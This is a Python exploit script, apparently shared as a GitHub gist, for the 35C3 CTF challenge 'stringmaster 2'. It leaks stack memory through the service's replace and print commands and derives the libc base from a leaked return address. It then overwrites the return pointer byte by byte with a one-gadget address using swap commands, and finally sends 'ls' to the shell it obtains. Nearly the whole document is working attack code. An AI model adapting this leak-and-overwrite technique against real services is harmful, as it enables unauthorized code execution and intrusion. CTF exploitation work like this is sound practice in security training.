# 35C3 - stringmaster 2 - my Python exploit
import socket
import struct
import sys
import time
# Find a byte sequence inside a larger array (i.e. locate a pointer by its expected value).
def find_index_of_subarray(arr, subarr):
    """Return the index of the first occurrence of ``subarr`` inside ``arr``.

    Works on any pair of sliceable sequences whose slices compare equal to
    the needle (e.g. ``bytearray`` against ``bytes``, or ``list`` against
    ``list``).

    Args:
        arr: Sequence to search in.
        subarr: Sequence to look for.

    Returns:
        Zero-based start index of the first match, or ``-1`` when ``subarr``
        does not occur in ``arr``. An empty ``subarr`` matches at index 0,
        mirroring ``bytes.find``.
    """
    needle_len = len(subarr)
    # Only start positions that leave room for the whole needle are tried, so
    # a needle longer than the haystack produces an empty range and -1.
    for start in range(len(arr) - needle_len + 1):
        if arr[start:start + needle_len] == subarr:
            return start
    return -1
# Return the sub-bytearray of the given length that starts at the given index of a bytearray.
def get_subarray_at_address(length, index, byte_array):
    """Return ``length`` items of ``byte_array`` starting at ``index``.

    Args:
        length: Number of items to extract.
        index: Zero-based start offset.
        byte_array: Sliceable sequence to read from.

    Returns:
        The slice ``byte_array[index:index + length]``, or the integer ``-1``
        when the requested window does not lie completely inside
        ``byte_array`` (including a negative ``index`` or ``length``).
    """
    # Negative values would otherwise slip past the upper-bound check and be
    # interpreted by the slice as "count from the end", returning wrong data.
    if length < 0 or index < 0 or index + length > len(byte_array):
        return -1
    return byte_array[index:index + length]
# Find the index of a given byte value in a byte array.
# A match that lies on a protected 8-byte line is skipped.
def find_byte_index(byte_value, byte_array, protected_lines):
    """Return the first index of ``byte_value`` outside the protected lines.

    The array is viewed as consecutive 8-byte lines; line ``k`` covers the
    offsets ``k * 8`` through ``k * 8 + 7``.

    Args:
        byte_value: Integer value to look for.
        byte_array: Iterable of integers (e.g. ``bytes`` / ``bytearray``).
        protected_lines: Collection of zero-based line numbers whose bytes
            must never be returned.

    Returns:
        Index of the first matching byte that is not on a protected line, or
        ``-1`` if there is none.
    """
    for index, byte in enumerate(byte_array):
        # index // 8 is the line the byte lives on. The first byte of the
        # line *after* a protected one is therefore not treated as protected.
        if byte == byte_value and index // 8 not in protected_lines:
            return index
    return -1
class Client:
    """Small blocking TCP client that drives a remote text command prompt.

    The client sends ``swap`` / ``replace`` / ``print`` / ``quit`` commands
    and keeps the raw bytes of the most recent server response in
    ``last_retrieved_bytes`` so callers can inspect leaked binary data.
    """

    # Text encoding used to build commands and to decode output for printing.
    encoding = 'UTF-8'
    # Undecodable bytes are dropped when server output is printed.
    decode_error_handling = 'ignore'
    host = ''
    port = 0
    # Maximum number of bytes requested per recv() call.
    buffer_size = 512

    def __init__(self, host, port):
        """Remember the target address and create an unconnected socket.

        The socket and the receive buffer are per-instance so that two
        clients never share a connection or a buffer.
        """
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.last_retrieved_bytes = bytearray()

    def connect(self):
        """Connect the socket to ``(host, port)``."""
        self.sock.connect((self.host, self.port))

    def disconnect(self):
        """Close the current socket and prepare a fresh one for reuse."""
        self.sock.close()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def wait_for_any_input(self):
        """Receive a single chunk, store it and print it decoded."""
        print('\033[92m' + 'Waiting for any input.' + '\033[0m')
        buffer = self.sock.recv(self.buffer_size)
        self.last_retrieved_bytes = bytearray(buffer)
        print(buffer.decode(self.encoding, self.decode_error_handling))

    def wait_for_prompt(self):
        """Receive until the command prompt or the quit message has arrived.

        The raw bytes received are stored in ``last_retrieved_bytes`` and
        printed decoded.

        Raises:
            ConnectionError: If the peer closes the connection before either
                terminator was received.
        """
        print('\033[94m' + 'Waiting for prompt.' + '\033[0m')
        endings = (
            'quit \n> '.encode(self.encoding),
            'You lost.'.encode(self.encoding),
        )
        self.last_retrieved_bytes = bytearray()
        # Match on the raw bytes so that dropped undecodable bytes can never
        # glue unrelated text into a false terminator.
        while not any(ending in self.last_retrieved_bytes for ending in endings):
            buffer = self.sock.recv(self.buffer_size)
            if not buffer:
                # recv() returning b'' means the peer closed the connection;
                # without this check the loop would spin forever.
                print(self.last_retrieved_bytes.decode(self.encoding, self.decode_error_handling))
                raise ConnectionError('Connection closed while waiting for prompt.')
            self.last_retrieved_bytes += buffer
        print(self.last_retrieved_bytes.decode(self.encoding, self.decode_error_handling))

    def retrieved_bytes_truncate_prompt(self):
        """Cut the stored response right before the command menu.

        If the menu header is not present the stored bytes are left as they
        are (slicing with a "not found" index of -1 would drop the last byte).
        """
        beginning = 'Enter the command you want to execute:'.encode(self.encoding)
        index = self.last_retrieved_bytes.find(beginning)
        if index != -1:
            # Rebind instead of deleting in place so earlier references to the
            # untruncated buffer stay intact.
            self.last_retrieved_bytes = self.last_retrieved_bytes[:index]

    def prettyprint_retrieved_bytes(self):
        """Print and return a red hex dump of the stored bytes, 8 per line.

        Returns:
            The dump as a string, including the ANSI color codes.
        """
        data = self.last_retrieved_bytes
        rows = []
        for line_number, start in enumerate(range(0, len(data), 8), start=1):
            cells = ''.join('0x{:02x} '.format(value) for value in data[start:start + 8])
            rows.append('Line ' + str(line_number).zfill(3) + ': ' + cells + '\n')
        # '\033[91m' / '\033[0m' are the ANSI "red" and "reset" codes.
        string = '\033[91m' + ''.join(rows) + '\033[0m'
        print(string)
        return string

    def send(self, command_bytearr):
        """Log and send raw command bytes."""
        print('\033[92m' + 'Sending: ' + str(command_bytearr) + '\033[0m')
        self.sock.sendall(command_bytearr)

    def send_replace_overflow(self):
        """Send the fixed command ``replace X a``."""
        self.send('replace X a\n'.encode(self.encoding))

    def send_replace(self, char_1, bytearr):
        """Send ``replace <char_1> <bytearr>``.

        Args:
            char_1: Character to replace, as ``str``. It is encoded with
                ``self.encoding``, so a non-ASCII character becomes more than
                one byte on the wire.
            bytearr: Raw replacement bytes, sent unmodified.
        """
        command = ('replace ' + char_1 + ' ').encode(self.encoding)
        command += bytearr
        command += ' \n'.encode(self.encoding)
        # send() already logs the command; it is not printed a second time here.
        self.send(command)

    def send_swap(self, index_1, index_2):
        """Send ``swap <index_1> <index_2>``."""
        self.send(('swap ' + str(index_1) + ' ' + str(index_2) + ' \n').encode(self.encoding))

    def send_print(self):
        """Send the ``print`` command."""
        self.send('print\n'.encode(self.encoding))

    def send_quit(self):
        """Send the ``quit`` command."""
        self.send('quit\n'.encode(self.encoding))

    def send_ls(self):
        """Send ``ls``."""
        self.send('ls\n'.encode(self.encoding))
# Byte offset 17 * 8 is where octet 17 (counting from zero) starts, i.e. the
# 18th 8-byte line of the leaked dump. The script reads a pointer from there
# and later overwrites those 8 bytes.
return_pointer_index = 17 * 8
# Subtracted from the leaked pointer to obtain the libc base.
# NOTE(review): presumably the offset of __libc_start_main+231 in the target
# libc build -- confirm against the libc actually used by the service.
libc_main_231_absolute = 0x21ab0 + 231


def main():
    """Run the exploit against the service on localhost:22225.

    Steps: leak the data behind the string, derive the libc base from the
    pointer at ``return_pointer_index``, plant every byte of the gadget
    address into the start of the string with ``replace``, move those bytes
    onto the return pointer with ``swap``, then ``quit`` and talk to whatever
    answers.
    """
    client = Client('localhost', 22225)
    client.connect()
    try:
        client.wait_for_prompt()
        client.send_print()
        client.wait_for_prompt()
        # NOTE(review): the author calls this the "overflow" replace;
        # presumably it makes the following print leak past the string -- confirm.
        client.send_replace_overflow()
        client.wait_for_prompt()
        client.send_print()
        client.wait_for_prompt()
        client.retrieved_bytes_truncate_prompt()
        client.prettyprint_retrieved_bytes()

        leak = client.last_retrieved_bytes
        # get_subarray_at_address signals "out of range" with -1, which
        # struct.unpack cannot handle, so verify the leak is long enough first.
        if len(leak) < return_pointer_index + 8:
            print('Leak too short: got ' + str(len(leak)) + ' bytes, need at least '
                  + str(return_pointer_index + 8) + '.')
            sys.exit(-1)
        libc_main_231_subarray = get_subarray_at_address(8, return_pointer_index, leak)
        libc_main_231 = struct.unpack('<Q', libc_main_231_subarray)[0]
        print('libc_main_231_addr is : ' + hex(libc_main_231))
        libc_base = libc_main_231 - libc_main_231_absolute
        print('libc base is: ' + hex(libc_base))
        # NOTE(review): 0x4f2c5 is presumably a one-gadget offset for the same
        # libc build -- confirm.
        gadget_int = 0x4f2c5 + libc_base
        print('gadget is: ' + hex(gadget_int))
        # Packed big-endian on purpose: the swap loop below walks the bytes in
        # reverse, which yields the little-endian order written to the stack.
        gadget_bytes = struct.pack('>Q', gadget_int)

        # First, replace the leading bytes of the leaked data with the gadget
        # bytes so that every needed value exists somewhere swap can reach.
        for offset, gadget_byte in enumerate(gadget_bytes):
            current = chr(client.last_retrieved_bytes[offset])
            client.send_replace(current, bytes([gadget_byte]))
            # Refresh the dump after every command; the next step reads it.
            client.wait_for_prompt()
            client.send_print()
            client.wait_for_prompt()
            client.retrieved_bytes_truncate_prompt()

        # Then swap each gadget byte into its place in the return pointer.
        # Line 17 (the return pointer itself) is protected so that bytes
        # already placed there are never picked as the swap source.
        for offset, byte in enumerate(reversed(gadget_bytes)):
            print('Swapping: ' + hex(byte))
            index = find_byte_index(byte, client.last_retrieved_bytes, [17])
            if index == -1:
                print('Index for ' + str(byte) + ' not found!')
                sys.exit(-1)
            client.send_swap(return_pointer_index + offset, index)
            client.wait_for_prompt()
            client.send_print()
            client.wait_for_prompt()
            client.retrieved_bytes_truncate_prompt()

        print('Replaced all bytes for return pointer to libc_system')
        client.send_quit()
        client.wait_for_prompt()
        client.send_ls()
        print('This should be shell.')
        client.wait_for_any_input()
        print('Retrieved bytes counter: ' + str(len(client.last_retrieved_bytes)))
        # Use the client's lenient decoding: command output is not guaranteed
        # to be valid UTF-8 and a strict decode would crash at the very end.
        print(client.last_retrieved_bytes.decode(client.encoding, client.decode_error_handling))
    finally:
        client.sock.close()


if __name__ == '__main__':
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment